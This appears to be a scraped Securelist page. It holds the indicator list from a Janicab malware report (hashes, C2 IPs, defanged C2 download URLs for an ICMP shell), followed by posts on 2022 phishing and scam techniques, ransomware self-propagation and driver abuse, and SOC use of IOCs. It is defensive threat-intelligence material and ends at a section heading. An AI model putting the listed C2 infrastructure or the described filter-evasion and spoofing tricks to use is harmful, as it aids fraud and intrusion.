  • H4: tracking financial assets of/for VIPs
  • H5: competitive/business intelligence for medium/large companies
  • H6: intelligence on medium/large mergers and acquisitions
Indicators of Compromise

Note: We provide an incomplete list of IoCs here that are valid at the time of publication. A full IoC list is available in our private report.

File hashes

Janicab

F1B5675E1A60049C7CD823EBA93FE977 26.03.2021 Corporate Profile Hydraulica.lnk 7EA6F821523003A04ABE5AE3AC546150 16.02.2021 AckerCR-Resume.lnk 03CFA51AA7F0893F1D0FEB32B521CC61 30.04.2020 SMPT-error.txt.lnk

Post exploitation

B5190D7CC4D7A59AD4962B8614DB8521 K.dll Keylogger F086C3DBCDE4228CA274BE45C80C6F0F map.txt 8D3D2364220D376E6F8D123E57CF4551 replacer.py DB1EB8B831332143349B6E6AD9AB12A2 PythonProxy.py 48E4DBC53C611CD324FCAF6418E06A52 ftp.py F1F23D4DF41C5DA5444C97781FF2CAB7 junction.exe B5450C8553DEF4996426AB46996B2E55 plink.exe 37382F2F1495F61F3504320EE4ECAF6A runner.py AD2195E2977BFB824C8AFDAB38E531B2 snapshot.dll (screenshot tool) 96EBCFB2CC9E6C5D0AD2CEC2522F1274 %user%:.dll (internal name: Screenshots.dll) 84AA12FE7C7AB241A2E0CA2DB5DB2865 snapshot.dll (UPX-packed version of Screenshots.dll) B2E25926FE6DDCB049737CB514752A72 AdobeUpdater.dll EF8B8426861D7B633615FD3014021FC4 similar keylogger F73C54B08B84DF11D90B3A009D07748F similar keylogger 5F1A9913AEC43A61F0B3AD7B529B397E ICMP shell DDR Patterns
  • “Dosen’t (typo by threat actor) matter how long you wait for the bus on a rainy day, (.*) seconds was enough to get wet?”
  • “This is the (.*)th time this has happened to me”
  • “our (.*)th psy anniversary”
Domains and IPs

176.223.165[.]196
87.120.254[.]100
87.120.37[.]68

URLs

hxxp://<C2_ip_address>/d/icmpxa.exe | ICMPShell
hxxp://<C2_ip_address>/d/unrar.exe | rar tool
hxxp://<C2_ip_address>/d/procdump.exe | Sysinternals procdump
hxxp://<C2_ip_address>/d/Rar.exe | rar tool
hxxp://<C2_ip_address>:8080/api/icmp_kaspersky/icmpxa.exe | ICMPShell
hxxp://<C2_ip_address>:8080/api/icmpxa.exe | ICMPShell

Dead-drop resolvers

hxxps[://]youtu[.]be/AApRxqOjLs4
hxxps[://]youtu[.]be/Tn7L5RyRAlM
hxxps[://]youtu[.]be/aZRJQdwN4-g

 
[1] APT intel reports: “An in-depth look into Deceptikons LNK-based Powersing toolkit”
[2] FIN intel reports: “A new threat activity targeting financial institutions probably for competitive intelligence using EVILNUM backdoor”

2022. december 6.

Main phishing and scamming trends and techniques

There are two main types of online fraud aimed at stealing user data and money: phishing and scams. Phishers primarily seek to extract confidential information from victims, such as credentials or bank card details, while scammers deploy social engineering to persuade targets to transfer money on their own accord.

The history of scams and phishing

The term “phishing” was coined back in 1996, when cybercriminals attacked users of America Online (AOL), the largest internet provider at that time. Posing as AOL employees, the scammers sent messages asking users to verify their accounts or asking for payment details. This method of phishing for personal data is still in use today, because, unfortunately, it continues to yield results.

Also in the 1990s, the first online scams appeared. When banks began to roll out internet banking, scammers sent text messages to users supposedly from relatives with an urgent request to transfer money to the details given in the message.

By the early 2000s, charity had become a common scam topic: for example, after the massive Indian Ocean earthquake and tsunami of 2004, users received messages from fake charities pleading for donations. At around the same time, phishers started targeting online payment systems and internet banks. Since user accounts in those days were protected only by a password, it was enough for attackers to phish out this information to gain access to victims’ money. To do this, they sent e-mails in the name of companies such as PayPal, asking users to go to a fake site displaying the corporate logo and enter their credentials. To make their sites look more credible, cybercriminals registered multiple domains all very similar to the original, differing by just two or three letters. An inattentive user could easily mistake a fake for a genuine bank or payment system website. In addition, scammers often used personal information from victims’ own social media pages to make their attacks more targeted, and thus more successful.

As time progressed, online fraud became ever more sophisticated and persuasive. Cybercriminals learned how to successfully mimic the official websites of brands, making them almost indistinguishable from the original, and to find new ways to approach victims. There appeared services specializing in creating fake content, at which point phishing really took off. Now not only the personal data and finances of ordinary users were in the firing line, but politicians and big business as well.

This report examines the main phishing trends, methods, and techniques that are live in 2022.

Phishing and scams: current types of fraud Phishing:

Phishers can target credentials in absolutely any online service: banks, social networks, government portals, online stores, mail services, delivery companies, etc. But it is customers of top brands that are most often at risk, because people use and trust them more than smaller brands, increasing the likelihood of a successful attack.

To extract the coveted information, cybercriminals try to persuade victims that they are logging in on the real website of the respective company or service, or that they are sharing their credentials with a company employee. Often, fake sites look no different from the original, and even an experienced user might be fooled. Phishers skillfully copy the layout and design of official sites, adding extra details to their pages, such as live chat support (usually inactive), and linking to real services to inspire confidence.

Phishing site with chat support

Recently, alongside online phishing, vishing (voice phishing) has been on the rise. Scammers either call victims directly, or employ various tricks to get them to make the call, after which they attempt to extract their personal data and money over the phone.

Fake message about Windows-related issues in connection with which the victim must call the scammers

Also current is targeted or spear phishing, which, as the name suggests, is aimed at a specific individual or organization. Spear-phishing e-mails and sites are far more personalized than bulk ones, making them very difficult to distinguish from genuine ones.

Scams

While phishers target both businesses and ordinary internet users, scammers prey mostly on the latter. Most scams work by offering the victim an easy way to earn a chunk of money, or the chance to win a valuable prize or get something for free or at a huge discount. The main goal of this type of threat is to raise money, but scammers can also harvest the victim’s personal data to sell later or use in other schemes.

In the screenshot below, for example, the victim is informed they have won a smartphone and asked to pay a small fee to have it delivered, as well as specify their e-mail address, date of birth, gender, phone number, and home address.

Form for collecting personal data to send the bogus prize

In most cases, scammers ask for this data to convince the victim that the prize will indeed be sent, and do not store it. However, some scammers may save all the information entered on their sites for the purpose of later sending malicious e-mails supposedly from victims, using their names and addresses.

Besides promises of easy money and valuable prizes, scammers actively lure users to non-existent dating sites. For example, they might send an invitation to chat with other users, together with a link to a scam site and attractive photos. Once on the fake site, the user is told they can get premium access to the dating platform for next to nothing, but the offer expires today. They just need to sign up and pay a small fee.

Offer to activate a premium account on a fake dating site

There are other ways to attract victims to scam sites: by “selling” sought-after or scarce goods, or trips with like-minded travelers, etc. In general, if something’s popular with users, fraudsters will use it as bait.

Distribution

Although most scams and phishing attacks begin with mass e-mails containing links to fake websites, alternative attack vectors are gaining ground today. There are so many different communication and data sharing platforms that attackers can use to distribute phishing links.

Messengers

One of the main vectors for phishing and scaming are messengers such as WhatsApp and Telegram.

WhatsApp users might receive a fraudulent message from either the cybercriminals themselves or someone in their contact list. To spread their scams, attackers send messages in the name of popular brands or government agencies, but have no qualms about involving users too. In particular, to receive a gift promised in a message, they often get the victim to forward it to all or some of their contacts.

Cybercriminals get the victim to forward a link to a fake giveaway to their WhatsApp contacts

Recently, many channels have appeared on Telegram promising prizes or get-rich cryptocurrency investment schemes. The chats of popular Telegram channels are also home to scammers who, posing as ordinary users, post juicy money-making and other offers. For posting comments en masse, cybercriminals can use bots. To discover the secret of easy money, the user is invited to contact the scammers or go to their channel.

Comment in a Telegram chat promoting a currency exchange scheme

Social networks

Comments offering easy profits are also found on social networks, for example, under photos in popular accounts, where messages are more likely to be read than on a page with fewer followers. Cybercriminals invite users to follow a link in a profile header, send them a direct message, or join a secret group chat. A message can also contain a link to a phishing or scam site. Posts promising well-paid part-time work with a link to a mini app are also common on VK, the Russian equivalent of Facebook. In addition, cybercriminals can use social networks to send direct messages to users, promote their offers, or create fake accounts promising valuable gifts, in-game currency, and gift cards. These are hyped up through ads, hashtags, or mass tagging of users in posts, comments, or on photos.

Instagram account “giving away” free smartphones

Marketplaces

Marketplaces act as an intermediary between the user and the seller, to some extent ensuring the security of the transaction for both parties. But their functionality is open to abuse by scammers as well. A widespread scheme on Russian marketplaces is when the seller appears reluctant to communicate on the site and tries to move the conversation to a third-party messenger where they can send a malicious link without fear of triggering the marketplace’s built-in defenses.

Also on marketplaces, scammers often comment on other users’ reviews of products, assuring potential buyers that an item can be purchased for far less elsewhere, and attaching a link to a scam site.

Scammers distribute links to fake sites through comments on product reviews on marketplaces

Phishing and scam attack methods

To carry out attacks, cybercriminals employ a wide range of technical and psychological tricks to dupe as many users as possible while minimizing the risk of detection.

Below are the main phishing and scam techniques used in 2022.

Spoofing

To increase the victim’s trust in a fake resource, scammers often try to make it as similar as possible to the original. This technique is known as spoofing. In the context of website spoofing, there are two main types:

  • Domain spoofing, when attackers fake a website domain to fool users,
  • Content spoofing, when they mimic the appearance of a legitimate site.

It’s common for attacks to deploy both of these.

Domain spoofing involves registering a domain similar to that of the target organization. Phishers are careful to choose domains that don’t look suspicious to victims. Domain spoofing can be divided into three categories:

  • Typosquatting is the use of the original domain name with typos commonly made by users when inputting the URL, such as missing or extra characters, or letters in the wrong order.

Misspelling of the domain Instagram.com, where the number 9 appears instead of the letter “g”

  • Combosquatting is the use of additional words, often related to authorization or online security, in a domain name similar to that of the brand whose users are the target. For example, words like “login”, “secure”, “account”, “verify”, and so on.

The word “account” in a domain name alongside the name of a bank

  • Internationalized domain name (IDN) homograph attacks work by using Unicode characters that closely resemble letters in the Latin alphabet. For example, the most commonly used Cyrillic letters in such attacks are a, c, e, o, p, x, y, because they look identical to Latin a, c, e, o, p, x, y.

Content spoofing is used to fake the appearance of a legitimate site. Here, the following methods can be singled out:

  • Legal iFrame Background is when an iFrame is used to load a legitimate site onto a rogue one, on top of which a phishing form is overlaid.

Legitimate site serving as a background for a phishing form

  • HTML spoofing is the visual imitation of a legitimate site by, among other things, partially copying its style and HTML code. Scammers often use software for creating mirror sites, such as HTTrack and Website Downloader.
  • Comment in the HTML code of a phishing page indicating that HTTrack was used

    Website hacking

    Sometimes it’s easier for scammers to hack others’ sites to host malicious content than to create their own from scratch. Such phishing pages tend to be short-lived, because the site owners quickly detect and remove scam content, as well as regularly patch holes and vulnerabilities in their infrastructure. That said, if cybercriminals break into an abandoned site, phishing pages hosted there can survive a long time. Phishers can exploit compromised sites in several ways:

    • iFrame Injection is when a login form or other part of a phishing page is inserted through an iFrame. Whereas the Legal iFrame Background method involves the use of an iFrame with a legitimate website as the background for a phishing form, in the case of iFrame Injection the URL of the page is legitimate, while the iFrame contains a phishing form, whose background is most often homemade content using brand logos.

    Login form created using an iFrame on a hacked site

    • Subfolder Hijacking is the partial hacking of a site to gain access to its subdirectories to place fraudulent content there. Such attacks can either use existing directories on the legitimate site or create new ones.

    Home page of a hacked site that looks normal

    Phishing page placed in a subdirectory of a hacked site

    • Site Swapping is the complete replacement of a legitimate site with a phishing one. The original content is usually removed.
    Using legitimate services

    Some internet scammers, instead of bothering to create or hack sites, prefer to exploit the features of services trusted by users. As such, forms for creating online surveys and collecting data (Google Forms, MS Forms, HubSpot Form Builder, Typeform, Zoho Forms, etc.) are very often used to perform an attack.

    For example, in the screenshot below, scammers under the guise of technical support for a popular cryptowallet use a Google form to coax identification data out of users, such as e-mail address and secret phrase.

    Fraudsters try to finagle confidential data through Google Forms

    Although such services have started to warn users about the dangers of sharing passwords through forms, as well as to implement automatic protection (such as blocking forms containing keywords like “password”), this method remains popular with scammers due to the ability to mass-create phishing surveys. To bypass built-in security, they often use text spoofing, that is, they replace characters in keywords with visually similar ones: for example, they write pa$$w0rd instead of password, making such words unrecognizable to automated systems.

    Besides forms, cybercriminals make active use of cloud documents. Not least, they can send e-mails with a link to a document in a legitimate service that contains a phishing link.

    Avoiding detection

    Scammers use various techniques to hide from detection. Some are quite effective but not so common, because they require more advanced technical know-how than many scammers possess.

    One method to avoid detection is obfuscation, where the user-invisible source code of a scam page is scrambled to make the attack hard to detect by automated means. We talked in detail about obfuscation methods in our post about the phishing-kit market.

    Another way to protect a scam site from detection is to use methods to hide page content from automated analysis. Here are some of them:

    • Use of images. If text is replaced with images of text, content engines will be unable to see and analyze the text, so users will read it.
    • Browser notifications. Links to scam resources can be distributed through browser notifications. Unlike e-mails and public websites, browser notifications are processed in several stages, and not all anti-phishing engines analyze them. This allows cybercriminals to bypass at least some detection technologies.

    To download a song on a scam site, the user is asked to allow browser notifications from that site

    • Pop-up windows. Scam content can open in pop-up windows on a site. Pop-up windows load later than the site’s main window, so not all anti-phishing technologies see them. In addition, pop-up windows furnish attackers with additional tools to copy the appearance of a legitimate site. In particular, cybercriminals can use the Browser-in-the-Browser method, when a pop-up window imitates a browser window with an address bar showing the URL of a legitimate site.

    Browser-in-the-Browser attack: a pop-up window mimics a browser window with an address bar

    Along with content, scammers try to hide the URLs of malicious sites from detection technologies. For this purpose, they can use:

    • URL links randomly generated using hashes. Each victim receives a unique link, which makes it difficult to block a malicious site.
    • URL shorteners. Attackers can mask malicious addresses using legitimate URL shorteners, such as bit.ly.
    Social engineering elements

    Cybercriminals’ tricks often target the user and not the security system’s vulnerabilities. Scammers employ their knowledge of the human psyche to deceive victims. These can be combined with technical means to achieve a devastating effect.

    • Fake CAPTCHA. Cybercriminals mimic CAPTCHA technology on scam sites to persuade victims to perform certain actions.

    Fake CAPTCHA on a phishing page asking for permission to show browser notifications, supposedly to prove you’re not a robot

    • User-Related Dynamic Content. The page content changes depending on the user and their data, such as e-mail address: to fake the domain, images are downloaded from the user’s mail and inserted into the phishing page.

    Attackers use the victim’s mail domain to create content on a scam site

    • Intimidation and threats. Cybercriminals can intimidate victims to make them panic and act rashly. For example, they may threaten legal action and demand payment of a “fine” for the victim to be left in peace. Attackers can also threaten to block the victim’s account to force them to click a phishing link.

    Scammers threaten to seize all the user’s property and accounts if they fail to pay off a bogus debt

    • Attackers give victims a limited time window to respond to their message in one way or another to make them act rashly.

    Scam site demands urgent payment of “COVID-19-related expenses” for delivery of a parcel

    • An appeal to pity. Cybercriminals try to arouse people’s sense of pity to get them to part with their cash.
    • Lucrative offers. Scammers tempt victims with lip-smacking offers that are hard to refuse.

    Cybercriminals lure the user with the chance to win an Amazon gift card

    Conclusion

    Most users today are more or less aware of the current web threats. Many have either experienced internet scams themselves, or know about them from the news or other sources, making it harder for attackers to dupe victims and so requiring the use of ever more sophisticated methods. Instead of slapdash phishing and scam sites, high-quality fakes are becoming increasingly common. This includes mimicking a browser window with a legitimate URL in a pop-up window, as well as phishing pages with a legitimate site in the background, loaded via an iFrame. We’ve also seen elements of targeted attacks in phishing and scams, such as downloading content related to the target’s mail domain or using data got from large-scale leaks to make contact with potential victims.

    At the same time, vishing is on the rise, because it’s easier to apply pressure over the phone, giving the victim no time to mull things over. In addition, cybercriminals use other available communication channels: e-mail, popular messengers, social networks, marketplaces.

    To implement attacks, they employ a variety of techniques, such as spoofing, social engineering, site hacking, and code and content hiding. Alongside this, detection avoidance methods also continue to evolve. Attackers are increasingly using one-time generated links with hashes to prevent web threat detection technologies from blocking them.

    Note, too, that scammers continue to base their malicious campaigns on the hottest topics in the news. If there’s a major event going on somewhere, a problem on a country or global scale, or some service or technology is becoming all the rage, be sure that cybercriminals will seek to exploit it. For instance, the lockdown period was beset by large-scale “financial aid” scams, while last year’s upturn in cryptocurrency prices went hand in hand with numerous fraudulent investment schemes. So it pays to be vigilant online, especially when it comes to money: no matter how much you want to believe that good fortune has fallen from the sky, if something sounds too good to be true, it probably is.

2022. december 5.

Crimeware trends: self-propagation and driver exploitation

Introduction

If one sheep leaps over the ditch, the rest will follow. This is an old saying, found in various languages, and it can be applied to ransomware developers. In previous blog posts, we highlighted an increase in the popularity of platform-independent languages and ESXi support, and recently, we wrote about ransomware borrowing these propagation methods.

Last month, we wrote in our crimeware reporting service about further ransomware variants that now had their own methods for copying and executing malware on other machines within the network. We also wrote about a case of abusing vulnerable drivers, something that might become popular in the future as well. In this blog post, we provide excerpts from these reports.

For questions or more information on our crimeware reporting service, please contact crimewareintel@kaspersky.com.

Some ransomware statistics

During the first ten months of 2022, the share of users affected by targeted ransomware among all users affected by all types of malware almost doubled year-on-year, reaching 0.026%.

Share of users attacked by targeted ransomware, January–October 2021 and January–October, 2022 (download)

LockBit

LockBit is one of the most popular, innovative and rapidly developing current ransomware families. Recently, we noticed that a new option was added to the LockBit builder site, as can be seen below:

New functionality created by LockBit developers

In addition to PsExec, the most common way of spreading ransomware overall, LockBit now supports “self-spread”. Naturally, we were interested in the details of this self-spreading mechanism—especially, how it works.

The ransomware is installed as a service onto the infected machine. This service makes a call to netapi32.DsGetDcNameW to get the details of the domain that the infected machine belongs to and then creates a named pipe. When this operation is complete, the module dumps the operating system credentials, obtaining the handles from explorer.exe and lsass.exe with the help of the named pipe created earlier.

This is where it stops. Essentially, there is no self-spreading—this is more of credential dumping. Although it fits in the broader trend we are seeing these days—more and more functionality embedded in ransomware to reduce reliance on other tools—there is no self-spreading, as it is no longer necessary to use tools like Mimikatz.

Play

Play is a new ransomware variant that we recently ran into—it has no code similarities with other ransomware samples. The ransomware is highly obfuscated, which complicates analysis.

Play is in an early development stage. For example, there is no leak site and victims have to contact the criminals via the email address in the ransom note. Despite this, Play also contains functionality that lately has been found in other ransomware variants: self-propagation.

Play collects different IPs on the same subnet and tries to discover SMB resources with the help of NetShareEnum(), which results in ARP traffic, as can be seen from the Wireshark screenshot below. The idea behind this activity is to spread the ransomware to other machines on the same network.

ARP requests made by Play ransomware

Once an SMB resource is found, the ransomware establishes a connection, and tries to mount it, and to spread and execute itself in the remote system. This can be seen in the Wireshark screenshot below.

SMB connections

Driver abuse

Drivers can contain vulnerabilities that attackers may be able to exploit. One such driver is Anti Rootkit by Avast. Although it was previously abused by AvosLocker, the vulnerabilities that are being exploited now (CVE-2022-26522 and CVE-2022-26523) were not known back then. They allow attackers to escalate their privileges in the targeted system or perform a sandbox escape. The vulnerabilities were described in detail by SentinelLabs and fixed at the beginning of 2022. We know that at least two ransomware families, AvosLocker and Cuba, exploit these.

There are a few advantages to using the trick with vulnerable drivers. Firstly, it disables other security products in the system. Secondly, it is a security solution that is being installed, which results in fewer alerts being raised. Thirdly, by exploiting the driver, the attackers can kill processes running on the machine.

The process killing function

Conclusion

Ransomware developers keep an eye on their competitors’ work. If one of them implements certain functionality that works well, chances are that others will follow suit This keeps their ransomware more interesting for their affiliates. The self-propagation of ransomware is a prime example of that.

Therefore, we believe that faulty drivers could be yet another instance of typical ransomware group TTP that other groups will borrow in the future.

Intelligence reports can help you to protect yourself against these threats. If you want to stay up to date on the latest TTPs used by criminals or if you have questions about our private reports, please contact crimewareintel@kaspersky.com.

2022. december 2.

Indicators of compromise (IOCs): how we collect and use them

It would hardly be an exaggeration to say that the phrase “indicators of compromise” (or IOCs) can be found in every report published on the Securelist. Usually after the phrase there are MD5 hashes[1], IP addresses and other technical data that should help information security specialists to counter a specific threat. But how exactly can indicators of compromise help them in their everyday work? To find the answer we asked three Kaspersky experts: Pierre Delcher, Senior Security Researcher in GReAT, Roman Nazarov, Head of SOC Consulting Services, and Konstantin Sapronov, Head of Global Emergency Response Team, to share their experience.

What is cyber threat intelligence, and how do we use it in GReAT?

We at GReAT are focused on identifying, analyzing and describing upcoming or ongoing, preferably unknown cyberthreats, to provide our customers with detailed reports, technical data feeds, and products. This is what we call cyber threat intelligence. It is a highly demanding activity, which requires time, multidisciplinary skills, efficient technology, innovation and dedication. It also requires a large and representative set of knowledge about cyberattacks, threat actors and associated tools over an extended timeframe. We have been doing so since 2008, benefiting from Kaspersky’s decades of cyberthreat data management, and unrivaled technologies. But why are we offering cyber threat intelligence at all?

The intelligence we provide on cyberthreats is composed of contextual information (such as targeted organization types, threat actor techniques, tactics and procedures – or TTPs – and attribution hints), detailed analysis of malicious tools that are exploited, as well as indicators of compromise and detection techniques. This in effect offers knowledge, enables anticipation, and supports three main global goals in an ever-growing threats landscape:

  • Strategic level: helping organizations decide how many of their resources they should invest in cybersecurity. This is made possible by the contextual information we provide, which in turn makes it possible to anticipate how likely an organization is to be targeted, and what the capabilities are of the adversaries.
  • Operational level: helping organizations decide where to focus their existing cybersecurity efforts and capabilities. No organization in the world can claim to have limitless cybersecurity resources and be able to prevent or stop every kind of threat! Detailed knowledge on threat actors and their tactics makes it possible for a given sector of activity to focus prevention, protection, detection and response capabilities on what is currently being (or will be) targeted.
  • Tactical level: helping organizations decide how relevant threats should be technically detected, sorted, and hunted for, so they can be prevented or stopped in a timely fashion. This is made possible by the descriptions of standardized attack techniques and the detailed indicators of compromise we provide, which are strongly backed by our own widely recognized analysis capabilities.
What are indicators of compromise?

To keep it practical, indicators of compromise (IOCs) are technical data that can be used to reliably identify malicious activities or tools, such as malicious infrastructure (hostnames, domain names, IP addresses), communications (URLs, network communications patterns, etc.) or implants (hashes that designate files, files paths, Windows registry keys, artifacts that are written in memory by malicious processes, etc.). While most of them will in practice be file hashes – designating samples of malicious implants – and domain names – identifying malicious infrastructure, such as command and control (C&C) servers – their nature, format and representation are not limited. Some IOC sharing standards exist, such as STIX.

As mentioned before, IOCs are one result of cyber threat intelligence activities. They are useful at operational and tactical levels to identify malicious items and help associate them with known threats. IOCs are provided to customers in intelligence reports and in technical data feeds (which can be consumed by automatic systems), as well as further integrated in Kaspersky products or services (such as sandbox analysis products, Kaspersky Security Network, endpoint and network detection products, and the Open Threat Intelligence Portal to some extent).

How does GReAT identify IOCs?

As part of the threat-hunting process, which is one facet of cyber threat intelligence activity (see the picture below), GReAT aims at gathering as many IOCs as possible about a given threat or threat actor, so that customers can in turn reliably identify or hunt for them, while benefiting from maximum flexibility, depending on their capabilities and tools. But how are those IOCs identified and gathered? The rule of thumb on threat hunting and malicious artifacts collection is that there is no such thing as a fixed magic recipe: several sources, techniques and practices will be combined, on a case-by-case basis. The more comprehensively those distinct sources are researched, the more thoroughly analysis practices are executed, and the more IOCs will be gathered. Those research activities and practices can only be efficiently orchestrated by knowledgeable analysts, who are backed by extensive data sources and solid technologies.

General overview of GReAT cyber threat intelligence activities

GReAT analysts will leverage the following sources of collection and analysis practices to gather intelligence, including IOCs – while these are the most common, actual practices vary and are only limited by creativity or practical availability:

  • In-house technical data: this includes various detection statistics (often designated as “telemetry”[2]), proprietary files, logs and data collections that have been built across time, as well as the custom systems and tools that make it possible to query them. This is the most precious source of intelligence as it provides unique and reliable data from trusted systems and technologies. By searching for any previously known IOC (e.g., a file hash or an IP address) in such proprietary data, analysts can find associated malicious tactics, behaviors, files and details of communications that directly lead to additional IOCs, or will produce them through analysis. Kaspersky’s private Threat Intelligence Portal (TIP), which is available to customers as a service, offers limited access to such in-house technical data.
  • Open and commercially available data: this includes various services, file data collections that are publicly available, or sold by third parties, such as online file scanning services (e.g., VirusTotal), network system search engines (e.g., Onyphe), passive DNS databases, public sandbox reports, etc. Analysts can search those sources the same way as proprietary data. While some of these data are conveniently available to anyone, information about the collection or execution context, the primary source of information, or data processing details are often not provided. As a result, such sources cannot be trusted by GReAT analysts as much as in-house technical data.
  • Cooperation: by sharing intelligence and developing relationships with trusted partners such as peers, digital service providers, computer security incident response teams (CSIRTs), non-profit organizations, governmental cybersecurity agencies, or even some Kaspersky customers, GReAT analysts can sometimes acquire additional knowledge in return. This vital part of cyber threat intelligence activity enables a global response to cyberthreats, broader knowledge of threat actors, and additional research that would not otherwise be possible.
  • Analysis: this includes automated and human-driven activities that consist of thoroughly dissecting gathered malicious artifacts, such as malicious implants, or memory snapshots, in order to extract additional intelligence from them. Such activities include reverse-engineering or live malicious implant execution in controlled environments. By doing so, analysts will often be able to discover concealed (obfuscated, encrypted) indicators, such as command and control infrastructure for malware, unique development practices from malware authors, or additional malicious tools that are delivered by a threat actor as an additional stage of an attack.
  • Active research: this includes specific threat research operations, tools, or systems (sometimes called “robots”) that are built by analysts with the specific intent to continuously look for live malicious activities, using generic and heuristic approaches. Those operations, tools or systems include, but are not limited to, honeypots[3], sinkholing[4], internet scanning and some specific behavioral detection methods from endpoint and network detection products.
How does GReAT consume IOCs?

Sure, GReAT provides IOCs to customers, or even to the public, as part of its cyber threat intelligence activities. However, before providing them, the IOCs are also a cornerstone of the intelligence collection practices described here. IOCs enable GReAT analysts to pivot from an analyzed malicious implant to additional file detection, from a search in one intelligence source to another. IOCs are thus the common technical interface to all research processes. As an example, one of our active research heuristics might identify previously unknown malware being tentatively executed on a customer system. Looking for the file hash in our telemetry might help identify additional execution attempts, as well as malicious tools that were leveraged by a threat actor, just before the first execution attempt. Reverse engineering of the identified malicious tools might in turn produce additional network IOCs, such as malicious communication patterns or command and control server IP addresses. Looking for the latter in our telemetry will help identify additional files, which in turn will enable further file hash research. IOCs enable a continuous research cycle to spin, but it only begins at GReAT; by providing IOCs as part of an intelligence service, GReAT expects the cycle to keep spinning at the customer’s side.

Apart from their direct use as research tokens, IOCs are also carefully categorized, attached to malicious campaigns or threat actors, and utilized by GReAT when leveraging internal tools. This IOC management process allows for two major and closely related follow-up activities:

  • Threat tracking: by associating known IOCs (as well as advanced detection signatures and techniques) to malicious campaigns or threat actors, GReAT analysts can automatically monitor and sort detected malicious activities. This simplifies any subsequent threat hunting or investigation, by providing a research baseline of existing associated IOCs for most new detections.
  • Threat attribution: by comparing newly found or extracted IOCs to utilized IOCs, GReAT analysts can quickly establish links from unknown activities to define malicious campaigns or threat actors. While a common IOC between a known campaign and newly detected activity is never enough to draw any attribution conclusion, it’s always a helpful lead to follow.
IOC usage scenarios in SOCs

From our perspective, every security operation center (SOC) uses known indicators of compromise in its operations, one way or another. But before we talk about IOC usage scenarios, let’s go with the simple idea that an IOC is a sign of a known attack.

At Kaspersky, we advise and design SOC operations for different industries and in different formats, but IOC usage and management are always part of the SOC framework we suggest our customers implement. Let’s highlight some usage scenarios of IOCs in an SOC.

Prevention

In general, today’s SOC best practices tell us to defend against attacks by blocking potential threats at the earliest possible stage. If we know the exact indicators of an attack, then we can block it, and it is better to do so on multiple levels (both network and endpoint) of our protected environment. In other words, the concept of defense in depth. Blocking any attempts to connect to a malicious IP, resolve a C2 FQDN, or run malware with a known hash should prevent an attack, or at least not give the attacker an easy target. It also saves time for SOC analysts and reduces the noise of SOC false positive alerts. Unfortunately, an excellent level of IOC confidence is vital for the prevention usage scenario; otherwise, a huge number of false positive blocking rules will affect the business functions of the protected environment.

Detection

The most popular scenario for IOC usage in an SOC – the automatic matching of our infrastructure telemetry with a huge collection of all possible IOCs. And the most common place to do it is SIEM. This scenario is popular for a number of reasons:

  • SIEM records multiple types of logs, meaning we can match the same IOC with multiple log types, e.g., domain name with DNS requests, those received from corporate DNS servers, and requested URLs obtained from the proxy.
  • Matching in SIEM helps us to provide extended context for analyzed events: in the alert’s additional information an analyst can see why the IOC-based alert was triggered, the type of threat, confidence level, etc.
  • Having all the data on one platform can reduce the workload for the SOC team to maintain infrastructure and prevent the need to organize additional event routing, as described in the following case.

Another popular solution for matching is the Threat Intelligence Platform (TIP). It usually supports better matching scenarios (such as the usage of wildcards) and assumes reducing some of the performance impact generated by correlation in SIEM. Another huge advantage of TIP is that this type of solution was initially designed to work with IOCs, to support their data schema and manage them, with more flexibility and features to set up detection logic based on an IOC.

When it comes to detection we usually have a lower requirement for IOC confidence because, although unwanted, false positives during detection are a common occurrence.

Investigation

Another routine where we work with IOCs is in the investigation phase of any incident. In this case, we are usually limited to a specific subset of IOCs – those that were revealed within the particular incident. These IOCs are needed to identify additional affected targets in our environment to define the real scope of the incident. Basically, the SOC team has a loop of IOC re-usage:

  1. Identify incident-related IOC
  2. Search for IOC on additional hosts
  3. Identify additional IOC on revealed targets, repeat step 2.
Containment, Eradication and Recovery

The next steps of incident handling also apply IOCs. In these stages the SOC team focuses on IOCs obtained from the incident, and uses them in the following way:

  • Containment – limit attacker abilities to act by blocking identified IOCs
  • Eradication and Recovery – control the lack of IOC-related behavior to verify that the eradication and recovery phases were completed successfully and the attacker’s presence in the environment was fully eliminated.
Threat Hunting

By threat hunting we imply activity aimed at revealing threats, namely those that have bypassed SOC prevention and detection capabilities. Or, in other words, Assume Breach Paradigm, which intends that despite all the prevention and detection capabilities, it’s possible that we have missed a successful attack and have to analyze our infrastructure as though it is compromised and find traces of the breach.

This brings us to IOC-based threat hunting. The SOC team analyzes information related to the attack and evaluates if the threat is applicable to the protected environment. If yes, the hunter tries to find an IOC in past events (such as DNS queries, IP connection attempts, and processes execution), or in the infrastructure itself – the presence of a specific file in the system, a specific value of registry key, etc. The typical solutions supporting the SOC team with such activity are SIEM, EDR and TIP. For this type of scenario, the most suitable IOCs are those extracted from APT reports, or received by your TI peers.

In IOC usage scenarios we have touched on different types of IOCs multiple times. Let’s summarize this information by breaking down IOC types according to their origin:

  • Provider feeds – subscription for IOC provided by security vendors in the form of a feed. Usually contains a huge number of IOCs observed in different attacks. The level of confidence varies from vendor to vendor, and the SOC team should consider vendor specialization and geo profile to utilize actual IOCs. Usage feeds for prevention and threat hunting are questionable due to the potentially high level of false positives.
  • Incident IOCs – IOC generated by the SOC team during analysis of security incidents. Usually, the most trusted type of IOC.
  • Threat intelligence IOCs – a huge family of IOCs generated by the TI team. The quality depends directly on the level of expertise of your TI Analysts. The usage of TI IOCs for prevention depends heavily on the TI data quality and can trigger too many false positives, and therefore impact business operation.
  • Peer IOCs – IOCs provided by peer organizations, government entities, and professional communities. Can usually be considered as a subset of TI IOCs or incident IOCs, depending on the nature of your peers.

If we summarize the reviewed scenarios, IOC origin, and their applicability, then map this information to NIST Incident Handling stages[5], we can create the following table.

IOC scenario usage in SOC

All these scenarios have different requirements for the quality of IOCs. Usually, in our SOC we don’t have too many issues with Incident IOCs, but for the rest we must track quality and manage it in some way. For better quality management, the provided metrics should be aggregated for every IOC origin to evaluate IOC source, not the dedicated IOCs. Some basic metrics, identified by our SOC Consultancy team, that can be implemented to measure IOC quality are:

  • Conversion to incident – which proportion of IOCs has triggered a real incident. Applied for detection scenarios
  • FP rate – false positive rate generated by IOC. Works for detection and prevention
  • Uniqueness – applied for IOC source and tells the SOC team how unique the set of provided IOCs is compared to other providers
  • Aging – whether an IOC source provides up-to-date IOCs or not
  • Amount – number of provided IOCs by source
  • Context information – usability and fullness of context provided with IOCs

To collect these metrics, the SOC team should carefully track every IOC origin, usage scenario and the result of use.

How does the GERT team use IOCs in its work?

